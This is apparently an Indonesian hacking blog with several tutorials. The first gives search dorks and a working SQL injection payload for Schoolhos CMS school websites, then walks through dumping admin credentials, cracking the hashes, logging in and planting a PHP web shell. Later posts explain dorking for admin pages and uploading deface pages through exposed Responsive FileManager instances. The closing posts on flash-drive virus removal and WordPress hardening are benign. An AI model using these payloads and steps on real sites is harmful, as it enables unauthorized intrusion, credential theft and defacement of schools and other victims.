Deface SQLi Schoolhos CMS


Lagi lagi CMS yang banyak di gunakan website sekolah memiliki BUG, setelah Balitbang, Popoji CMS.. Nanti apa lagi yah ?? Kali ini bukan tentang Baltibang atau Popoji CMS melainkan "Schoolhos CMS" mungkin CMS ini belum sempurna makanya masih memiliki BUG yang Cukup beresiko !! simak langsung aja tutorial "Deface SQLi Schoolhos CMS"


Bahan-bahan :

1. Dork :
inurl:"/?p=info" site:id
inurl:"/?p=detberita"
inurl:"/?p=guru" site:id
kembangkan lagi dengan otak hentai kalian :v

2. SQL Injection (Exploit SQL)
' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

3. MD5 Hash Decrypter :https://hashkiller.co.uk/

Step by Step :

1. Dorking di gugel (jangan dorking gambar coeg)

2. Pilih target kamu

3. Masukan Exploit (SQL Injection) contoh : http://targetkamu.domain/?p=detberita&id=5' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

Deface SQLi Schoolhos CMS

4. Kalo vuln akan muncul username dan password nya.

Deface SQLi Schoolhos CMS

Note : itukan setelah admin ada angka-angka contoh : admin20160407 nah si angka 20160407 abaikan aja.

5. Copy MD5 Hash tadi, lalu kamu buka MD5 Decrypter tadi. kamu masukan di situ. hash yang tadi.

6. Setelah selesai di hash kamu login ke panel admin. lokasinya : http://targetkamu.domain/adminpanel/

7. Masukan username dan password yang kamu dapat tadi..

8. Lanjut !! mau tanam shell ?? kamu tinggal ke menu Berita, Informasi, Album Galeri.

9. Rename dlu shell kamu dari shell.php jadi shell.php.jpg

10. Setelah itu pilih shell kamu lalu gunakan tamper data..

11. Ganti nama shell kamu dari shell.php.jpg jadi shell.php (ganti pas di tamper datanya)

Note : tanam shell dan akses shell nya sama kaya Lokomedia kok.

Warning ! : Karena yang menggunakan CMS ini adalah web sekolah.. saya mohon jangan terlalu berlebihan mengexploitnya. Dan jangan juga tebas index malu om sama total archive defacean kamu.
Apalagi bawa-bawa nama Indonesia dan blabla. Pengen tenar ?? kaga usah show off defacean web sekolah.. kalo gw liat sih bakal gw ketawain.

Mengenali Dork Google Dan belajar mengembangkannya

Garuda Security Hacker | Official Blog
Hmm, pasti kata google dork sudah tidak asing lagi bagi kalian kan? tp apakah kalian tau arti dari dork google ??. kali ini saya ada materi tentang "Mengenali Dork Google dan Belajar Cara Mengembangkannya". Simak aja baik baik :)

Arti Dari Google Dork :

Dork adalah semua susunan kata kunci yang di gunakan untuk mencari infomasi di google dengan lebih efektif dan lebih terkhususkan (itu menurut saya).

Fungsi Dork Google :

Fungsi nya adalah mencari sumber informasi lebih detail dan terperinci, kalian bisa mengetahui letak login admin website, bug sebuah website, bahkan kalian bisa mengetahui password/username admin sebuah website, namun jangan harap kalian bisa melakukan itu semua kalau kalian tidak bisa mengebangka dork

Cara Mengembangkannya :

Kalian harus menggunakan logika kalian untuk membuat/mengembakan dork, misalnya kalian mencari tempat upload file (bug untuk menyerang) kalian harus mencari url, title, text yang berkaitan dengan upload file.

Kata Kunci Dasar Dork :

mungkin yang kalian tau hanyalah intitle, inurl, intext -_- sebenarnya masih ada lagi selain itu..

1. Intitle : untuk mencari judul dari sebuah laman

2. Intext : untuk mencari sebuah text yang terdapat pada laman

3. Inurl : untuk mencari url yang berkaitan dengan sebuah halaman

4. Site : untuk mencari sebuah site, jika di gunakan site:.domainnegara maka itu untuk mencari domain (kalian bisa googling nama-nama domain negara) jika di gunakansite:www.target.com dan di kombinasikan dengan inurl tau intitle itu lebih terkhusus kan pada website yg di tuju

5. Ext : untuk mencari extensi url sepeti, .php .html .asp dan lain-lain

6. Cache : akan menunjukkan daftar web yang telah masuk ke dalam indeks database Google, yang berhasil didapatkan oleh Google Crawler

7. Penggunaan tanda "dork"  (2kutip) : fungsi nya untuk menggunci dork agar lebih berurutan sesuai dork yg di dari


Sekian dulu tutorial kali ini semoga bermanfaat, jika banyak salah/kurangnya mohon maaf saya juga hanya newbie yang fakir ilmu :( dan jangan lupa sering seringlah berkunjung di blog ini. :D 

#tinggalkan Jejak di Komentar.. :D

Deface Dengan phUploader Vulnerbility File Upload



Biasa,, lagi iseng iseng dorking nemu file terus ane klik,, ternyata semacam file manager lebih tepatnya : "Responsive FileManager" file manager nya juga udah kaga asing bagi ane.. ane pernah liat saat exploiting Popoji CMS (web sekolah sendiri, sebelum exploit itu tenar dimana2). eh ternyata ane keduluan sama E7B_404 , yang lebih dlu tau exploit ini, terus ane kembangin lagi dorknya aja... ok deh simak aja Tutorialnya.. "Deface Dengan Responsive FileManager"

Bahan-Bahan :

Dork :
  1. inurl:/filemanager/ intext:"dialog.php"
  2. inurl:/js/filemanager/ intext:"dialog.php"
  3. inurl:/assets/filemanager/ intext:"dialog.php"

Exploit (File yang terinfeksi/bisa di exploit) :
dialog.php
example :www.targetsuka.co.li/filemanager/dialog.php

Script Pepes
klo belum punya bikin atau colong punya orang

Step by Step :

1. Seperti biasa,, dorking adalah hal wajib.. dorking di gugel pake dork di atas (saya pakai dork no.1)

2. Pilih target nyaa..

Deface Dengan Responsive FileManager
Klik dialog.php

3. Setelah klik dialog.php kalian akan beralih ke Responsive FileManager

4. Cari aja tombol upload di pojok atas kiri (biasanya di situ)

Deface Dengan Responsive FileManager
Klik aja.

5. Setelah itu kalian klik lalu pilih script deface kalian

6. Jika sukses hasilnya seperti ini..

Deface Dengan Responsive FileManager
Ada tanda ceklis berwarna hijau
7. Untuk aksesnya kalian.. kembali dlu ke awal Responsive FileManager nya (klik tombol hitam di atas) lupa gw tandain :v

8. Klik kanan pada file yang telah kalian upload tadi,, lalu pilih Show URL

Deface Dengan Responsive FileManager

9. Kalian Copy url nya terus paste di address bar browser kamu.. dan jrengg-jrengg..

10. Nitip nick boleh kali ?? MR.R.S

11. Nitip nama Garuda Security Hackerboleh kali ??

Ok sampai di sini dulu Cara deface phUploader Vulnerbility File Upload semogah bermanfaat :) Jangan bosan bosan kkunjungi BLOG ini ya.. :D




Menghapus Virus di Flashdisk Dengan Android



Baiklah kali ini saya akan membahas tutorial sederhana lagi tentang membersihkan Virus yang bandel di Flashdisk dengan Android
Pertama pastikan perangkat android kalian support dengan OTG kemudian sambungkan perangkat android kalian dengan OTG dan Flashdisk seperti gambar di bawah ini.
USB-OTG-Adapter-Connects-USB-Accessories-to-Your-Android-Device
Setelah OTG dan Flashdisk terhubung ke perangkat android kalian maka akan muncul seperti gambar dibawah ini jika dibuka dengan aplikasi File Manager.
Screenshot_2011-01-02-04-20-07
Kemudian buka usb_storage maka akan muncul isi data Flashdisk seperti gambar dibawah ini.
Screenshot_2011-01-02-04-21-16
Dan virus nya ada di folder RECYCLER_DETEC dan file hash kombinasi huruf dan angka seperti gambar di bawah ini.
Screenshot_2011-01-02-04-21-31
Dan file yang berekstensi .vbe adalah virus nya seperti gambar dibawah ini
Screenshot_2011-01-02-04-21-38
Kemudian Hapus file nya seperti gambar dibawah ini.
Screenshot_2011-01-02-04-23-27
Hapus Folder System Volume Information
Screenshot_2011-01-02-04-23-55
Hapus Folder Recycler_detec seperti gambar dibawah ini.
Screenshot_2011-01-02-04-24-03
Kemudian unmount Flashdisk nya seperti gambar dibawah ini
Screenshot_2011-01-02-04-24-32
Setelah itu coba colokin Flashdisknya ke PC / Laptop jika sudah bersih maka tidak antivirus pun menyatakan bahwa flashdik nya  bersih seperti gambar dibawah ini.
cats
Tambahan jika kalian melakukan cara ini sebaik nya lebih teliti dalam melakukan proses penghapusan data cek dari folder ke folder nya jika sudah yakin ada file yang dicurigai bevirus maka lebih baik hapus saja.
Mohon Hati-hati dalam memperaktekkan nya karena cara ini juga kemungkinan ada resiko nya
baiklah sekian dan terimakasih

Cara Mengamankan WordPress Dari Serangan Hacker

         


Baiklah saya MR.R.S akan menjelaskan bagaimana cara mengamankan situs wordpress anda dari serangan hacker dan defacer ok baiklah langsung saja kita ke TKP
Pasti pada bertanya bagaimana cara mengatasi nya ?
ok mari langsung saja simak step by step nya nah disini saya praktek nya via XAMPP Webserver
ok pertama pertama login dulu ke wordpress nya
wp 1
kemudian pilih plugins
wp 2
kemudian pilih add new
wp 3
selanjut nya pilih upload plugin
wp 4
selanjutnya download dulu plugin nya https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/  setelah itu baru browse file nya
wp 5
ok kemudian pilih file nya seperti gambar di bawah ini
wp 6
kemudian klik install now
wp 7
biarkan wordpress melakukan proses install plugin nya
wp 8
kemudian aktikan plugin nya dengan klik Activate Plugin
wp 9
jika seperti gambar dibawah ini berarti plugin sudah aktif
wp 10
kemudian buka WP Security seperti gambar dibawah ini
wp 11
Kemudian pilih username seperti gambar dibawah ini
wp 12
karena username nya default yaitu admin maka demi keamanan ganti username nya contoh nya seperti gambar dibawah ini kemudian klik change username.
wp 13
maka otomatis akan logout wordpress nya kemudian login dengan username yang baru dan password nya seperti gambar dibawah ini.
wp 14
jika muncul seperti gambar dibawah ini berarti tidak ada masalah.
wp 15
Selanjut nya pilih Login Lockdown seperti gambar dibawah ini
wp 16
fungsi dari login lockdown ini adalah membatasi kesalahan dalam memasukkan password sehingga jika ada hacker dan defacer yang melakukan bruteforce maka otomatis IP nya langsung diblokir.
wp 17
Ceklist semua nya dan sesuaikan “Max Login Attemps”, “Login Retry Time Period”, dan “Time Lenght of Lockout” sesuai dengan kebutuhan kalian.
wp 18
jika sudah selesai klik save settings
wp 19
Kemudian selanjutnya pilih File Permission
wp 20
Pilih seluruh nya dengan mengklik “Set Recommended Permissions” seperti gambar dibawah ini
wp 21
Lanjut ke Tab PHP File Editing checklist aja kemudian save settings
wp 22
Kemudian pada bagian tab WP File Access checklist saja dan save settings
wp 23
Loh kok masih merah ? ya karena ini di xampp dan biasanya kalo di webserver hosting warna nya hijau kok jika sudah disetting dengan benar baiklah lanjut ke Basic Firewall.
wp 24
Pada tab basic firewall settings checklist saja fungsinya untuk mencegah hacker dan defacer buat mengakses file-file sensitif dan lebih lengkapnya kalian bisa lihat penjelasannya pada gambar dibawah ini.
wp 25
Checklis juga pada bagian Enable Pigback Protection fungsinya adalah melindungi wordpress dari serangan DDos atau Dos Attack, Menerobos Router Internal , dan Scanning Port seperti Nmap dan lainnya untuk lebih jelasnya kalian bisa lihat penjelasannya pada gambar dibawah ini.
wp 26
Kemudian klik save basic firewall settings
wp 27
ok lanjut ke tab Additional Firewall Settings pada bagian disable index views checklist saja
wp 28
pada bagian Disable Trace and Track checklist saja
wp 29
pada bagian Forbid Proxy Comment Posting juga di checklist saja
wp 30
untuk bagian Deny Bad Query Strings checklist juga
wp 31
terakhir checklist juga pada bagian Enable Advanced Character String Filter kemudian klik Save Additional Firewall Settings
wp 32
pada tab 5G/6G Firewal Settings checklist pada bagian Enable 6G Firewall Protection
wp 33
checklist juga bagian enable legacy 5G Firewall Protection lalu klik save 5G / 6G Firewall Settings
wp 34
pada Tab Internet Bot Settings checklis pada bagian Block Fake Googlebots dan kemudian klik save internet bot settings
wp 35
Kemudian Buka Menu BruteForce pada bagian menu sisi kiri seperti gambar dibawah ini.
wp 36
selanjutnya pada bagian Rename Login Page Settings ubah url login page wordpress kalian seperti gambar dibawah ini kemudian klik save settings.
wp 37
Kemudian pada tab login captcha checklist pada bagian Enable Captcha On Login Page
wp 38
pada bagian Enable Captcha On Lost Password Page di cheklist juga kemudian save settings
wp 39
Setelah itu pada bagian honeypot checklist pada bagian Enable Honeypot On Login Page lalu save settings
wp 40
kemudian mari kita uji dengan membuka url default worpress nah jika muncul seperti ini berarti rename login page tadi berhasil.
wp 41
Nah selanjut nya saya sudah jelaskan hasil dari Security Engineering nya seperti gambar dibawah ini
wp 42
ok baiklah cukup sampai disini tutorial security engineering nya jika ada kesalahan mohon koreksi nya

Sumber: bitosi.com
Hanya dengan Rp30.000/bulan, Pasang Iklan Teks Anda Disini Sekarang juga!
Hanya dengan Rp30.000/bulan, Pasang Iklan Teks Anda Disini Sekarang juga!
Hanya dengan Rp30.000/bulan, Pasang Iklan Teks Anda Disini Sekarang juga!
Hanya dengan Rp30.000/bulan, Pasang Iklan Teks Anda Disini Sekarang juga!